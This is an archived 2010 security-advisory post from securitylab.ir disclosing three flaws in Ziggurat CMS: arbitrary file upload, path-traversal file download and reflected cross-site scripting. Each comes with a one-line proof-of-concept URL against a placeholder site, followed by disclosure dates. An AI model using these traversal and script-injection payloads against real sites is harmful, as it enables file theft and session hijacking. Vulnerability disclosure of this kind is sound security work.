|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
info
securitylab.ir
Date: Thu Apr 15 2010 - 03:12:56 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Ziggurat CMS
# Vendor: http://www.farsi-cms.com
#################################################################
Vulnerability:
# Arbitrary File Upload
http://site.com/manager/upload.asp
# Remote File Download
http://site.com/manager/backup.asp?bck=./../file.asp
# Cross Site Scripting
http://site.com/index.asp?id=<script>("xss")</script>
#################################################################
# 2010-04-10 - Vendor notified
# 2010-04-15 - Public disclosure
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.Securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]